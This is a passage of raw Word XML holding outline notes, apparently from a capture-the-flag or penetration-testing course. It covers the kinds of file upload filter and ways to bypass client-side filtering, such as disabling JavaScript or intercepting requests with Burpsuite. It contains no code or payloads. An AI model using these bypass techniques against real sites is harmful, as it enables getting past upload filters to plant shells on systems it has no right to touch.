        <w:t>Site should hang but be accessible via listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3B6C05" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BABE576" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8EE46B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Differences between client and server side filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD9CC9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Client-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D4A289" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Web application is running in users browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C419A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>JS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1D9700" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Filtering occurs before the file is even uploaded to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36369D9D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Easy to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684955DE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Server-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60700A93" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>PHP, C#, Node.js, Python, Ruby on Rails, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45529CF1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>More difficult to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5BA6D7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Must form payload that conforms to filters in place while allowing execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C3F0E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Types of filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ABB15D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Extension Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BFF5E2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Blacklist or whitelist certain extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648A251" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Can be bypassed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B87AE47" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File Type Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F35C41E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Similar to extension validation, more intensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB18325" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>MIME Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710110E2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Identifier for files, usually over email or HTTP(S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F1A46A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>MIME type for file upload located in header of request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D4927" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Content-Type: &lt;type&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C446C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Follow &lt;type&gt;/&lt;subtype&gt; format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849A240" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Easy to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE241DF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Magic Number Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205F2EF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>More accurate determination of file contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79459C61" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Magic number of a file is a string of bytes at the very beginning of the file content which identify the content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8D221B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. PNG file would have the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0762632B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>89 50 4E 47 0D 0A 1A 0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648317C0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Common in Unix systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14330442" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File Length Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043713D9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Prevent huge files from being uploaded to the server via an upload form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50012454" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File Name Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DB82B5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check if pre-existing or contain bad characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E322B93" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Null bytes or forward slashes on Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BE8DBB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Control characters such as ; and Unicode characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5004EB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>May have to go hunting for shell on a well-administered system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD977E0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File Content Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D8914F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Prevents extension spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B61BC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Complex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F14191" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Often used in conjunction to prevent gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D0A1A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Any can be applied client or server side or both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10296AA7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Different languages and frameworks also filter differently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED4F07" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bypassing Client-Side Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD8885" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Four easy ways to bypass typical client-side file upload filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B535F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Turn off JS in your browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A437E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Intercept and modify the incoming page – Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC2CC3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
